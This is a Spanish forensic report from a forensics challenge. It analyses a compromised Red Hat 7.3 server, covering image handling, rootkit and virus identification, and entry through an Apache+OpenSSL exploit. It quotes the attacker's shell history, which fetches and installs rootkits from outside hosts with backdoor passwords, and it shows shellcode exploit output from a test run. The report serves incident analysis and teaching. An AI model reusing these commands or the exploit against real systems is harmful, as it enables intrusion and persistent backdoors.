Practica Forense
Practica Forense
Practica Forense
Informe Técnico
1
INTRODUCCIÓN
1. Primeros pasos: preparación del entorno y recogida datos inicial.
1.1. Preparación del entorno forense.
1.1.1. Estación de trabajo independiente.
1.1.2. Máquina test: equipo con el mismo SO que la atacada.
1.1.3. Software utilizado para el análisis.
1.2. Descarga y verificación de imágenes suministradas.
1.3. Montaje de las imágenes en la estación de trabajo independiente para
su análisis en frío.
1.4. Recogida inicial de datos para su posterior análisis.
2. Estudio forense de las evidencias.
2.1. Análisis del software instalado en la maquina atacada.
2.2. Comprobación de la existencia de una intrusión.
2.3. Búsqueda de los agentes causales de la modificación de los archivos.
2.3.1. Hipótesis rootkit instalado.
2.3.1.1. Suckit.
2.3.1.2. SHV4.
2.3.2. Hipótesis un virus en Linux:
2.3.2.1. Linux/RST.b.
2.3.2.2. Linux/OSF.a.
2.4. De como el atacante entra en el sistema.
2.5. Descripción del compromiso.
3. Análisis de las herramientas instaladas por el atacante.
3.1. Scanner y exploit de Samba: woot.tgz.
3.2. Scanner y exploit de Apache+ssl: selena.tgz.
3.3. Rootkit y backdoor: crk.tgz.
3.4. Irc Bouncer: psybnc.tgz.
3.5. Rootkit Suckit: sc.tgz.
3.6. Irc backdoor: https.
3.7. Backdoor: pico.
3.8. Backdoor: za.tgz.
3.9. Exploit: own.
4. Respuestas a las preguntas del reto.
4.1. ¿A que sistema corresponden las imágenes?
4.2. ¿El sistema fue vulnerado?
4.3. ¿Quien (desde donde) ingreso?
4.4. ¿Cómo ingreso?
4.5. ¿Qué recomendaciones harías para minimizar el riesgo de una nueva
intrusión?
2
Introducción
Un segundo objetivo no menos importante es el didáctico, tanto para los investigadores del
presente informe, como para los lectores del mismo. Por nuestra parte, hemos aprendido,
compartido, nos hemos divertido y sobre todo hemos dormido poco durante el tiempo del estudio.
Durante la recolección de las pruebas, hemos usado múltiples herramientas y hemos almacenado
información para escribir probablemente una trilogía de unos cientos de páginas. Sin embargo y en
aras de brevedad exigida por el reto y de la didáctica antes mencionada, solo se han reseñado las
partes más relevantes de esa información para que la lectura sea más ágil y amena.
Una primera en la que se indican los pasos de cómo preparar un entorno forense para el estudio
del caso, los pasos dados, las herramientas usadas, etc. Es la parte quizás más mecánica, pero sin
duda fundamental y que de no hacerse correctamente tira a traste el resto del trabajo. Una correcta
planificación en la fase de preparación facilitara el poder cumplir el resto de las partes de la forma
más rápida y eficiente.
Una segunda parte en la que se realiza el análisis forense propiamente dicho, buscando la
existencia de la intrusión, su origen, el servicio atacado y los pasos del atacante. Es probablemente
la parte más importante en cuanto a que responde a la mayor parte de las preguntas que
planteaba el reto.
En la tercera parte se estudian todas las herramientas que ha usado el intruso: rootkits, exploits,
scanners, herramientas de IRC, etc. Se describirá su función y como funcionan de forma
pormenorizada.
La cuarta y última parte, se plantea como unas conclusiones finales que responden a las
respuestas que plantaba el reto y resume brevemente los argumentos usados para llegar a dichas
conclusiones.
Ha sido una tarea larga pero apasionante y esperamos que el lector aproveche el trabajo que
hemos realizado.
3
1. Primeros pasos: preparación del entorno y recogida datos inicial.
Antes de comenzar con cualquier tipo de análisis, es fundamental, contar con un entorno
preparado para el estudio forense. En está parte es fundamental la planificación y tener claro que
tipo de acciones vamos a realizar a posteriori, puesto que muchas de las recogidas de información
en imágenes tan grandes como las de este caso, llevan mucho tiempo y un error puede hacer que
todo nuestro trabajo se pierda.
Una vez tenemos el entorno necesario, pasaremos a la recolección inicial de datos para su
posterior análisis. En el caso que nos ocupa, la recogida será en frío, es decir analizando las
imágenes del equipo sin arrancarlo por ejemplo en una máquina virtual. A pesar de que evaluamos
su realización, no hemos estimado necesario realizar un análisis en caliente de la maquina porque
tras el estudio en frío, llegamos a la conclusión de que no nos ofrecía información adicional para
resolver el reto.
Además de los paquetes propios de este sistema operativo, se instaron los paquetes sleuthkit y
autopsy 2 :
sleuthkit-1.73-oss_fc2_1.i386.rpm
autopsy-2.03-oss_fc2_3.i386.rpm
Para realizar todas las pruebas nos conectábamos a la maquina virtual por SSH, habilitando la
opción de guardado de logs desde el cliente SSH, que en este caso usamos el SecureCRT 3 .
En ambos casos, el del cliente SecureCRT y el del programa VMware, se usaron dos versiones de
prueba que caducan a los pocos días.
Antes de empezar a estudiar las imágenes se realizaron una serie de tareas. La primera es
configurar un acceso directo vía SSH con el SecureCRT a la maquina virtual donde vamos a
estudiar las imágenes. Usáremos siempre el usuario root en la maquina virtual, por ser este usuario
el que mas permisos tiene de ejecución de comandos. En este acceso se definió un fichero de log
que será donde se guarde un registro de todos los comandos y salidas ejecutadas a lo largo del
estudio. En el presente informe se pondrán extractos de este fichero de log.
1
VMware. http://www.vmware.com/vmwarestore/newstore/wkst_eval_login.jsp
2
Los paquetes sleuthkit y autopsy se descargaron de:
http://www.spenneberg.com/redirect.php?url=public/Forensics/sleuthkit/sleuthkit-1.73-oss_fc2_1.i386.rpm
http://www.spenneberg.com/redirect.php?url=public/Forensics/autopsy/autopsy-2.03-oss_fc2_3.i386.rpm
3
SecureCRT, aplicación cliente de telnet, ssh1 y ssh2 www.vandyke.com/products/securecrt/
4
Entre las características que dispone el programa SecureCRT se encuentra la ejecución de
comandos al recibir una cadena de respuesta de la maquina a la que nos conectamos. Según esto,
se configuro el SecureCRT para automatizar la entrada en la maquina virtual, posibilitando que se
conecte a la maquina, escriba el password de root y modifique variables de entorno. Se cambio
también en el sistema la variable PS1, o lo que es lo mismo: el prompt del usuario root, para lo cual
se modifico el fichero "/root/.bash_profile". Este formato de línea nos permite tener una idea
de los comandos ejecutados y su uso a lo largo de la realización de las pruebas con las imágenes.
Es interesante sobre todo si hay que presentar estas y otras pruebas en un futuro proceso judicial.
Por ultimo, se crea el archivo ".vimrc" en el HOME de root de la maquina virtual (/root). Este
fichero tendrá una única entrada que será "set number". Con esta línea hacemos que todos los
ficheros que se editen con el editor “vi” aparezcan con los números de línea de dicho fichero. Así
será más fácil la localización de las pruebas.
En la presentación de los listados, cada línea vendrá precedida con un número en rojo que indicara
el número de línea en dicho fichero.
Con objeto de tener la maquina lo más parecida al sistema atacado, además del mismo sistema
operativo, vamos a usar el mismo tipo de instalación que en la maquina atacada. Las opciones de
instalación se sacaron de la maquina comprometida del fichero /root/anaconda-ks.cfg. Para
realizar esta tarea, primero nos bajamos las imágenes, y las instalamos con las opciones que
aparecen en dicho fichero, entre las que destacan:
13 timezone America/Mexico_City
Los grupos de paquetes que se instalaron se listan a continuación. Además se instalaron los
paquetes de la base de datos mysql.
26 %packages
27 @ Network Support
28 @ Messaging and Web Tools
29 @ Anonymous FTP Server
30 @ SQL Database Server
31 @ Web Server
32 @ DNS Name Server
33 @ Software Development
34 @ Kernel Development
4
Se bajaron las imagines iso de la dirección:
ftp://ftp.rediris.es/sites/ftp.redhat.com/pub/redhat/linux/7.3/en/iso/i386
5
1.1.3. Software utilizado para el análisis
A continuación detallamos los programas que hemos utilizado:
Sleuthkit se compone de una serie de herramientas OpenSource en modo línea de comandos que
nos permiten investigar que ha sucedido en una máquina. Entre otras cosas, podemos recoger en
que fecha se han modificado, creado o accedido cualquiera de los ficheros de un sistema de
ficheros. Soporta múltiples sistemas de ficheros y es la herramienta fundamental para el análisis
forense. Muchas de las herramientas usadas en el presente informe están sacadas de comandos
de este paquete. http://www.sleuthkit.org/sleuthkit/index.php
SecureCRT es un cliente SSH comercial. La razón de usar este en concreto es que disponía de
algunas funcionalidades que nos facilitaban la labor durante el análisis.
http://www.vandyke.com/products/securecrt/
Como antivirus y detector de malware en general, hemos usado el excelente servicio VirusTotal
que examina con 16 motores antivirus los ficheros enviados. http://www.virustotal.com/
Realizamos la descarga de las imágenes de uno de los sitios indicados por los organizadores del
reto.
wget http://pgp.rediris.es:16000/reto/*
Procedemos a comprobar la integridad de los ficheros suministrados con la utilidad md5sum. Este
programa realiza una función de hash sobre cada fichero y genera una cadena de 16 dígitos
hexadecimal única para cada fichero. Cualquier modificación por mínima que sea del fichero
original, tendrá como resultado otra cadena de 16 dígitos hexadecimal totalmente diferente. De esa
forma y puesto que la organización del reto publicó la firma md5 de cada una de las imágenes,
procedimos a verificar la integridad de las mismas. Precisamente en este paso descubrimos que
una de las imágenes se había corrompido durante la transferencia y pudimos detectarlo en una
primera fase sin mayores problemas.
6
# mkdir /imagenes
# mv hda*.gz /imagenes
# cd /imágenes
# wget http://pgp.rediris.es:16000/reto/*
# gunzip hda*.gz
# md5sum *.dd
639c0cb8e90158b96cc4f1a3acefc5f1 hda1.dd
a3b9a3464d6f8e2494bca7126ec621b1 hda2.dd
b90bbfb50821086f195054013260888c hda3.dd
0c5ad84632aa4d6612f21f37c5bc4c4f hda5.dd
eb99858c421ae0a48ac7772600dff57c hda6.dd
Una vez comprobada la no modificación de las imágenes suministradas, se asume que desde que
se crearon las imágenes hasta que llegaron a nuestro poder dichas imágenes no sufrieron
modificaciones.
Intentamos montar la primera imagen (hda1.dd), que generalmente es la partición raíz del sistema.
En el montaje elegimos un sistema de ficheros tipo ext2, que es el mas común en un entorno
Linux, siendo éste el sistema operativo mas utilizado y por lo tanto el mas probable que sea usado
para el sistema que nos ocupa.
# mkdir /reto2
# mkdir /reto2/imagen1
# mount -o loop,ro,nodev -t ext2 /imagenes/hda1.dd /reto2/imagen1
Una vez ejecutados los comandos anteriores sin producir errores, ya tenemos montada la primera
imagen, lo que nos posibilita movernos por ella sin miedo a modificarla. Nos damos cuenta que es
un sistema operativo Redhat y mas concretamente versión 7.3. Este dato lo sacamos del fichero
/etc/redhat-release.
# cat /reto2/imagen1/etc/redhat-release
Red Hat Linux release 7.3 (Valhalla)
Nos queda conocer la correspondencia entre las imágenes proporcionadas y las particiones
físicas/lógicas de la maquina comprometida. En RedHat esta información se encuentra en el
fichero /etc/mtab, este fichero además nos informa que el formato de las particiones es del tipo
ext3.
1 /dev/hda1 / ext3 rw 0 0
2 none /proc proc rw 0 0
3 usbdevfs /proc/bus/usb usbdevfs rw 0 0
4 none /dev/pts devpts rw,gid=5,mode=620 0 0
5 /dev/hda2 /home ext3 rw 0 0
6 none /dev/shm tmpfs rw 0 0
7 /dev/hda5 /usr ext3 rw 0 0
8 /dev/hda3 /var ext3 rw 0 0
7
Nos falta conocer la correspondencia entre la última imagen hda6.dd y su punto de montaje. Para
averiguarlo, vemos el fichero /etc/fstab, este fichero nos informa que la partición buscada es el
swap del equipo y por lo tanto no tiene punto de montaje.
# cat /reto2/imagen1/etc/fstab
LABEL=/ / ext3 defaults 1 1
none /dev/pts devpts gid=5,mode=620 0 0
LABEL=/home /home ext3 defaults 1 2
none /proc proc defaults 0 0
none /dev/shm tmpfs defaults 0 0
LABEL=/usr /usr ext3 defaults 1 2
LABEL=/var /var ext3 defaults 1 2
/dev/hda6 swap swap defaults 0 0
/dev/cdrom /mnt/cdrom iso9660 noauto,owner,kudzu,ro 0 0
/dev/fd0 /mnt/floppy auto noauto,owner,kudzu 0 0
Según estos dos ficheros, la correspondencia de las imágenes suministradas queda de la siguiente
manera:
Otro dato importante antes de empezar un estudio exhaustivo de las imágenes es conocer la zona
horaria que esta definida en la maquina comprometida. Este dato es la referencia horaria del
supuesto ataque. Mirando el fichero /etc/sysconfig/clock vemos que esta definida como
ZONE="America/Mexico_City", o lo que es lo mismo Zona CST (Central Standard Time) o
GMT-6.
# vi /reto2/imagen1/etc/sysconfig/clock
1 ZONE="America/Mexico_City"
2 UTC=false
3 ARC=false
A partir de ahora, cuando se realicen referencias horarias, se tomara esta zona como referencia.
En cuanto a la precisión de dicha hora, se asume que es poco precisa al carecer la maquina de un
servidor NTP configurado. Por comodidad y para evitar estar haciendo continuamente el calculo
mental de la zona horaria en relación a nuestro equipo, se procede a meter la línea siguiente en el
fichero variable “TZ='America/Mexico_City'; export TZ“ en el fichero
/root/.bash_profile de la maquina virtual.
Ya tenemos los datos para empezar el estudio de la maquina comprometida. Montamos las
diferentes imágenes en un directorio a partir del cual se recreara el sistema atacado para posibilitar
su estudio.
# mkdir /reto2/hda
# mount -o loop,ro,nodev -t ext3 /imagenes/hda1.dd /reto2/hda
# mount -o loop,ro,nodev -t ext3 /imagenes/hda2.dd /reto2/hda/home
# mount -o loop,ro,nodev -t ext3 /imagenes/hda3.dd /reto2/hda/var
# mount -o loop,ro,nodev -t ext3 /imagenes/hda5.dd /reto2/hda/usr
Quedando los sistemas de ficheros de la siguiente manera una vez montadas las imágenes:
8
/imagenes/hda1.dd 1004024 80176 872844 9% /reto2/hda
/imagenes/hda2.dd 3020172 32860 2833892 2% /reto2/hda/home
/imagenes/hda3.dd 3020172 57676 2809076 3% /reto2/hda/var
/imagenes/hda5.dd 3020140 676624 2190100 24% /reto2/hda/usr
La información que vamos a recopilar en este punto, es casi un protocolo en cualquier análisis
forense. A partir de esta información cada caso nos llevara a recoger información distinta según el
sistema operativo, la información que se vaya encontrando, etc.
Lo primero que vamos a recoger son los tiempos de modificación, acceso y creación (mactime) de
los ficheros y directorios contenidos en las imágenes. Para ello, vamos a usar una de las
herramientas del Sleuthkit llamada fls.
A este listado le añadimos los ficheros que han sido borrados de las 4 particiones, para ello
usamos la herramienta ils que también pertenece al Sleuthkit. Como se pude apreciar no se incluye
la partición swap (hda6.dd) para crear estos listados, dado que, dicha partición no usa el sistema
de ficheros ext3 que estamos analizando. Para analizar el swap se usan otro tipo de técnicas que
luego veremos.
El fichero que hemos creado con las herramientas fls e ils, contienen los mactime en formato Epoc
Time (número de segundos a partir de las 00:00:00 horas del día 1 enero de 1970 UTC). Usaremos
la herramienta mactime para crear un fichero con un formato de hora fácilmente inteligible,
transformando el tiempo en formato Epoc Time a un formato “<día de la semana> <mes> <día del
mes> <año> <hora: minuto: segundos>” en la hora local de la maquina atacada. Además esta
herramienta ordena los accesos cronológicamente.
A continuación vamos a extraer de cada imagen la parte no usada (unallocated) del disco. En esta
información estarán contenidos el espacio sin usar y los ficheros y directorios borrados que aun no
han sido sobrescritos y que nos interesa ver o recuperar. Usaremos la herramienta dls de Sleuthkit.
Como decíamos antes, la partición hd6 que contiene el swap es un sistema de ficheros especial y
por tanto no podemos analizarla de igual manera. La forma más sencilla de obtener información del
swap es extraer también los strings que contiene. Para ello volveremos a usar la herramienta
sstrings de Sleuthkit.
El intruso, en la instalación de un rootkit, borró todos los logs del sistema que se encuentran en
/var/log/; así que no podemos consultar directamente la información que contenían y
compararla con cualquier otra que encontremos. Mas adelante trataremos de recuperar en los
ficheros borrados, al menos parte de estos logs para ser usados como evidencia.
10
2 Estudio forense de las evidencias
Con toda la información obtenida, podemos empezar el análisis del caso.
Al no existir apenas tiempo entre la instalación de unos paquetes y otros, siendo estas diferencias
de tiempo de segundos, asumimos que la instalación de software inicial se realizo en una sola vez.
Según el listado de más abajo, la instalación se realizo el día jueves 20 de enero de 2005 entre las
9:51 y 10:02. Asumimos que en la fecha del termino de la instalación la maquina no había sufrido
ningún tipo de intrusión, siendo el hipotético ataque realizado a partir de esa fecha. Mostramos a
continuación el primer y ultimo paquete instalado en la maquina con su fecha de instalación.
/reto2/rpm_instalados.txt
1 mysqlclient9-3.23.22-6 jue 20 ene 2005 10:02:42 CST
346 glibc-common-2.2.5-34 jue 20 ene 2005 09:51:33 CST
El siguiente comando almacena en un fichero la lista los ficheros de los paquetes instalados en la
maquina cuya firma md5 difiere de los que se suministraron con el paquete instalado.
De la lista anterior cogemos los ficheros que han sufrido modificaciones, o lo que es lo mismo, que
su suma md5 es diferente. En otra lista metemos los ficheros que han sido borrados.
11
Mirando los ficheros que han sido modificados, nos encontramos que han cambiado muchos
ficheros binarios del sistema, modificándose tanto el md5 del fichero (columna con valor 5), como
el tamaño de dicho fichero (columna con valor S). A continuación ponemos parte del fichero
rpm_md5_solo_modificados.txt.
/reto2/rpm_md5_solo_modificados.txt
2 S.5....T /bin/ping 43 S.5....T /bin/mktemp
3 S.5....T /bin/mt 44 S.5....T /bin/hostname
4 S.5....T /bin/setserial 45 S.5....T /bin/netstat
5 S.5....T /bin/chgrp 46 S.5....T c /etc/crontab
6 S.5....T /bin/chmod 47 S.5....T /bin/cpio
7 S.5....T /bin/chown 48 S.5....T /bin/ed
8 S.5....T /bin/cp 49 S.5....T /bin/gawk
9 S.5....T /bin/dd 50 S.5....T /bin/gawk-3.1.0
10 S.5....T /bin/df 51 S.5..... /bin/pgawk
11 S.5....T /bin/ln 52 S.5..... /bin/ash
12 S.5....T /bin/ls 53 S.5..... /bin/ash.static
13 S.5....T /bin/mkdir 54 S.5..... /bin/gunzip
14 S.5....T /bin/mknod 55 S.5..... /bin/gzip
16 S.5..... /bin/rm 56 S.5..... /bin/zcat
17 S.5..... /bin/rmdir 57 S.5..... /bin/sed
18 S.5..... /bin/sync 58 S.5..... /bin/tcsh
19 S.5..... /bin/touch 59 S.5..... /bin/basename
20 S.5..... /bin/grep 60 S.5..... /bin/date
21 S.5..... /bin/consolechars 61 S.5..... /bin/echo
22 S.5..... /bin/loadkeys 62 S.5..... /bin/false
23 S.5..... /bin/tar 63 S.5..... /bin/nice
24 S.5..... /bin/cat 64 S.5..... /bin/pwd
25 S.5..... /bin/cut 65 S.5..... /bin/sleep
26 S.5..... /bin/sort 66 S.5..... /bin/stty
27 S.5..... /bin/mount 67 S.5..... /bin/su
28 S.5..... /bin/umount 68 S.5..... /bin/true
29 S.5..... /bin/vi 69 S.5..... /bin/uname
33 S.5..... /bin/rpm 70 S.5....T /sbin/init
34 S.5..... /bin/doexec 71 S.5..... /bin/arch
35 S.5..... /bin/ipcalc 72 S.5..... /bin/dmesg
36 S.5..... /bin/usleep 73 S.5..... /bin/kill
41 S.5..... /bin/gettext 74 S.5..... /bin/login
42 S.5....T /bin/mail 75 S.5..... /bin/more
Lo que sabemos con toda seguridad tras ver esto es que han sido modificados comandos
binarios del sistema, y que la maquina ha sufrido algún tipo de compromiso.
12
2.3. Búsqueda de los agentes causales de la modificación de los archivos.
Los archivos pueden haber sido modificados por varias causas, a continuación presentamos dos
hipótesis que puedan explicar dicha modificación.
rkhunter-1.2.0.tar.gz
Descargamos el paquete de la página web del proyecto, los descomprimirlos y compilarlos. Los
resultados que se ven en la salida de la ejecución del rkhunter no son del todo precisos. Indica
que, a pesar de que existen ficheros en el sistema que pueden pertenecen a algunos rootkits, en
cambio, faltan también algunos ficheros de esos rootkits. La conclusión de esto es que puede
tratarse de variantes de estos rootkits que todavía no están dados de alta en la base de datos del
rkhunter, o que la instalación de algunos de esos rootkits ha sido incompleta.
Ejecutamos el scanner para buscar el rootkit instalado. La salida de este comando por consola
indica la posibilidad de tener algún rootkit. En el listado que adjuntamos, hemos suprimido las
líneas que no aportan información interesante desde el punto de vista del informe:
Check rootkits
* Default files and directories
Rootkit 'Flea Linux Rootkit'... [ Warning! ]
Rootkit 'SHV4'... [ Warning! ]
Rootkit 'Suckit Rootkit'... [ Warning! ]
Rootkit 'SunOS Rootkit'... [ Warning! ]
La ejecución de este programa crea un archivo de log, donde se muestran las comprobaciones que
realiza. Este archivo de logs se encuentra en /var/log/rkhunter.log.
Atendiendo a los ficheros contenidos en este log, llegamos a la conclusión de que hay rastros de
dos rootkits: Suckit y SHV4. Vamos a detallar muy brevemente en los siguientes puntos, los
ficheros encontrados de cada rootkit y la implicación que tiene en la intrusión. Se puede encontrar
una descripción completa de ambos rootkits en la sección 4 “Análisis de las herramientas
instaladas por el atacante”
2.3.1.1. Suckit 6 .
Suckit es un rootkit que no hace uso de binarios modificados, lo que hace es cargarse en la
memoria del kernel, pero en vez de cargarse como un modulo, como hacen otros rootkits de este
tipo (LKM rootkits como adore, rial, heroin, etc.) lo que hace es cargarse directamente a través de
/proc/kmem. Por lo tanto no necesita siquiera soporte para la carga de módulos en el kernel. Una
vez cargado proporciona una puerta trasera inversa, protegida con una contraseña y que se activa
5
Rkhunter: http://www.rootkit.nl/
6
Información sobre el Suckit Root Kit
http://www.phrack.org/phrack/58/p58-0x07
http://hepwww.rl.ac.uk/sysman/april2003/talks/SecurityIncidentReport.ppt
13
ante la llegada de un paquete spoofeado 7 . En este tipo de puerta trasera (inversa), la victima inicia
la conexión y de esta manera el atacante puede saltarse la configuración de la mayoría de los
firewalls.
Lo que hace el rootkit es sustituir el binario /sbin/init por otro que cargara el rootkit en memoria
en cuanto se reinicie la maquina. El fichero init original lo renombra a initxxxx donde xxxx es el
nombre del directorio donde guarda el rootkit los ficheros de configuración.
/.bash_history
4 wget xhack.150m.com/sc.tgz
5 tar -zxvf sc.tgz
6 cd sc
7 ./inst
8 ./sk
Una ultima comprobación que hacemos, viene dada por el md5 del fichero.
# md5sum /reto2/sbin/initsk12
a44b4fe49763349af054000b8565618a sbin/initsk12
Esta suma md5 corresponde exactamente con el md5 del mismo fichero encontrado en un
incidente en el que el suckit esta instalado y que esta documentado en Internet 8 .
2.3.1.2. SHV4 9 .
El SHV4 es un rootkit técnicamente menos sofisticado que el suckit. Básicamente es una serie de
scripts que instala nuevos binarios sobre los originales del sistema para ocultar información. Entre
sus otras funcionalidades están:
- Instala una puerta trasera (sshd) en un puerto configurable protegido con contraseña.
- Modifica el servidor sshd por uno que almacena el usuario y contraseña de cualquier
usuario que se conecte a esa maquina.
- Instala un sniffer llamando linsniffer y un script para extraer de sus logs, usuarios y
contraseñas.
7
Paquete spoofeado: paquete tcp/ip con la cabecera falsificada.
8
Información en la que aparece el md5 de un fichero de la maquina. Dicho fichero pertenece al rootkit Suckit
http://openskills.info/view/boxdetail.php?IDbox=20&boxtype=stdout
9
Información detallada sobre el SHV4
https://tms.symantec.com/members/AnalystReports/030929-Analysis-SHV4Rootkit.pdf
14
/.bash_history
14 wget www.zetu.as.ro/crk.tar.gz
15 tar xzvf crk.tar.gz
16 cd crk
17 ./install eliteaza 1
18 id
19 su
20 cd crk
21 dir
22 ./install eliteaz 9933
En la línea 17, se aprecia, que crea en el puerto 1 un servidor SSH con passwd “eliteaza” y un
poco más abajo instala otro en el puerto 9933 con passwd “eliteaz”. Durante la instalación ocurre lo
siguiente:
- Descomprime todos los ficheros que están en el tar.gz: bin.tgz, conf.tgz, lib.tgz,
bin/ssh-only.tgz y ssh.tgz.
- Se asegura de que el script esta corriendo como root.
- Mata el proceso syslogd.
- Coge el valor de la passwd suministrada como parámetro, o si no se le da ninguna, usa la
que esta por defecto (cycommrk) y genera dos ficheros iguales llamados
/etc/ld.so.hash y /lib/libext-2.so.7 que contiene la contraseña en formato
crypt (3). Esta es la contraseña que usara el servidor sshd que instala.
- Crea el script /etc/rc.d/init.d/cycomm que lanza el servidor ssh.
- Borra todos los logs del sistema que hay en /var/log y los bash_history de root.
- Muestra información del sistema.
- Borra el directorio de instalación y el tar.gz y acaba.
Algunas de las partes de la instalación fallan, dejando el rootkit a medio instalar y no funcional.
Si hubiera acabado, habría realizado las siguientes acciones:
Puesto que la instalación de este rootkit ha fallado en una fase tan básica, no afecta al sistema
más que en la creación de los ficheros /etc/ld.so.hash y /lib/libext-2.so.7 que por si
mismos no hacen nada, son solo la contraseña de la que sería una puerta trasera.
15
2.3.2.1. Linux/RST.b
Durante la búsqueda de rootkits en los apartados anteriores, nos llamaron la atención dos ficheros
vacíos que habían sido creados cuando el intruso ya estaba dentro de la maquina. Estos ficheros
eran /dev/hdx1 y /dev/hdx2. Tras una búsqueda en google, se indicaba que eran parte de un
virus para Linux llamado Linux/RST.b 10
Este virus, implementa varias capacidades de backdoor, permitiendo al atacante tomar control del
sistema infectado en el caso de que el virus haya sido ejecutado con privilegios de root. El virus
infecta todos los binarios que estén el directorio actual y los del directorio /bin hasta un máximo
de 30. El virus detecta cuando un fichero está ya infectado y no lo reinfecta. También pone en
modo promiscuo tanto el primer interfaz de red eth0 como el primer interfaz PPP (ppp0). Crea los
dispositivos /dev/hdx1 y /dev/hdx2 para usarlos como semáforos en la gestión de sniffing de
los interfaces comentados. Una vez completada la rutina de infección, trata de conectarse al
servidor web ns1.xoasis.com y descargarse el fichero gov.php que no existía. De esta manera
el que programo el virus presumiblemente tenía acceso a los logs de dicho servidor, y sabría qué
maquinas estaban infectadas.
También crea un socket de EGP (External Gateway Protocol) y espera a que le llegue un paquete
de este protocolo especialmente diseñado. Si ve un paquete EGP en el que el Byte 23 sea 0x11,
comprobara en el offset 0x2a de la parte de datos del paquete una contraseña de 3 bytes (DOM).
Si es correcta, el siguiente byte indicara el comando. Si es el 1, abrirá una shell /bin/sh, si es el 2
devuelve la contraseña (DOM).
Los binarios infectados contienen las cadenas “snortdos” y “tory” por lo que es fácil localizarlos.
Lo que nos da un total de 27 ficheros infectados. Esto nos hizo sospechar que había algo más que
se nos estaba escapando porque las firmas md5 de la base de datos rpm nos indicaba que había
65.
2.3.2.2. Linux/OSF.a 11
Tras la diferencia de ficheros modificados que encontramos en el punto anterior, le pasamos un
antivirus (fprot) al directorio /bin buscando más virus. Encontramos que el resto de ficheros que
habían sido modificados en este directorio estaban infectados por otro virus llamado Linux/OSF.a.
Este virus infecta binarios tipo ELF de Linux añadiéndoles 8759 bytes. Si el usuario root ejecuta un
fichero infectado, el virus infectará como mucho 201 ficheros del directorio /bin, pero nunca el
fichero ps. En este caso, ha infectado 51 de los 85 que contenía el directorio (los ficheros que no
había infectado el RST.b). Este virus tiene también propiedades de backdoor, una vez ejecutado, el
virus escuchara el puerto UDP 3049 esperando órdenes:
10
Información sobre Linux/RST.b
http://www.security-focus.com/archive/100/247640
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=ELF%5FRST%2EB&VSect=T
11
Linux/OSF.a: http://www.viruslibrary.com/virusinfo/Linux.OSF.8759.htm
16
- Redirigir el trafico de la maquina a otra maquina.
El virus también trata de editar las reglas del firewall y borrarlas para prevenir cualquier bloqueo del
mismo.
/reto2/mactime_todo.txt
129025 Sat Jan 29 2005 15:15:41 0 .a. -/-rwxr-xr-x apache apache 959 /etc/ssh/sshd_config~ (deleted)
129026 0 .a. -rwxr-xr-x apache apache 959 <hda1.dd-dead-959>
Esta vulnerabilidad afecta al paquete OpenSSL cuya versión sea inferior a la 0.9.6e. Siendo la
versión de OpenSSL instalada en la maquina del reto OpenSSL-0.9.6b
Puesto que sospechamos que la intrusión había sido a través del servidor Apache+SSL, para
confirmarlo, lanzamos el exploit que encontramos en el paquete selena contra nuestra máquina
test, siendo este el resultado de la prueba.
# Sending shellcode
ciphers: 0x814bac0 start_addr: 0x814ba00 SHELLCODE_OFS: 208
# Execution of stage1 shellcode succeeded, sending stage2
# Spawning shell...
12
selena.tgz: http://www.lurhq.com/atd.html
13
Exploit openssl-too-open: http://www.phreedom.org/solar/exploits/apache-openssl/
17
3:02pm up 2:01, 0 users, load average: 0.01, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a$
De esta comprobación se deduce que tanto la maquina test como la maquina del reto son
vulnerables a este exploit pudiendo un atacante externo entrar en la maquina con una shell que
pertenece al usuario apache.
Buscamos en los logs del servidor Apache de la maquina test las entradas que ha generado la
explotación de la vulnerabilidad. En el siguiente cuadro recogemos las entradas:
[Tue Mar 1 22:00:47 2005] [error] mod_ssl: SSL handshake failed (server 127.0.0.1:443,
client 10.0.128.2) (OpenSSL library error follows)
[Tue Mar 1 22:00:47 2005] [error] OpenSSL: error:1406908F:lib(20):func(105):reason(143)
No disponemos a buscar estos logs en la maquina atacada para confirmar que la intrusión se ha
producido usando este exploit. Puesto que el atacante borro todos los logs del sistema,
buscaremos esta información en el fichero /reto2/hda3.dd.unalloc.asc que contiene las
cadenas de texto de las zona no usada de la imagen hda3.dd (/var) que es la que contenía los logs
del sistema. Para ello usamos el comando grep y buscamos la cadena ”SSL handshake
failed”:
611097301 [Sat Jan 29 14:58:51 2005] [error] mod_ssl: SSL handshake failed
(server 127.0.0.1:443, client 64.202.43.190) (OpenSSL library error follows)
[…Continua…]
En las líneas anteriores confirmamos que el atacante ha entrado en la maquina aprovechando este
exploit. Además nos da más información sobre la intrusión:
14
CA-2002-23: http://www.cert.org/advisories/CA-2002-23.html
18
A las 15:11:44 se conecta por ftp a una dirección desconocida y presumiblemente se descarga
algo. Este dato lo sacamos del fichero /reto2/mactime_todo.txt.
/reto2/mactime_todo.txt
Sat Jan 29 2005 15:11:44 65832 .a. -/-rwxr-xr-x root root 32392 /usr/bin/ftp
En principio no tenemos acceso a lo que se descarga puesto que luego lo borra y no aparece en el
listado de ficheros borrados que nos muestra autopsy. Sospechamos que se trata del exploit que
usará para convertirse en root, aunque aun no tenemos ninguna evidencia. Recordamos que el
atacante todavía es usuario apache.
A las 15:16:49 del Sat Jan 29 2005 entra en el sistema el virus RST.b del que hablamos en el
punto 2.3.2.1, infecta el /bin/gawk y crea los dispositivos /dev/hdx1 y /dev/hdx2.
/reto2/mactime_todo.txt
129027 Sat Jan 29 2005 15:16:49 252844 m.c -/-rwxr-xr-x root root 47990 /bin/gawk
129028 0 mac -/---------- root root 37434 /dev/hdx1
129029 86016 m.c d/drwxr-xr-x root root 31937 /dev
129030 252844 m.c -/-rwxr-xr-x root root 47990 /bin/gawk-3.1.0
129031 0 mac -/---------- root root 37435 /dev/hdx2
Para que la infección se haya llevado a cabo, el virus ha tenido por fuerza que ser ejecutado como
root. Nuestra hipótesis de trabajo es que el atacante durante la sesión de ftp, se bajó un exploit
local ya compilado. Dicho exploit estaba infectado con el virus RST.b y al ejecutarlo y convertirse
en root, infecta al equipo. Veamos si podemos confírmalo.
Puesto puesto que el exploit ha sido borrado, aun podemos intentar buscarlo entre los ficheros
borrados que se encuentran en la zona no usada del disco. Esta tarea sería como buscar una
aguja en un pajar sin saber ni donde ni que buscar, pero en este caso, sabemos que como está
infectado con el virus RST.b tiene que contener forzosamente la cadena de texto “snortdos”.
Puesto que siendo el usuario apache, no podía escribir en demasiados sitios, lo más probable es
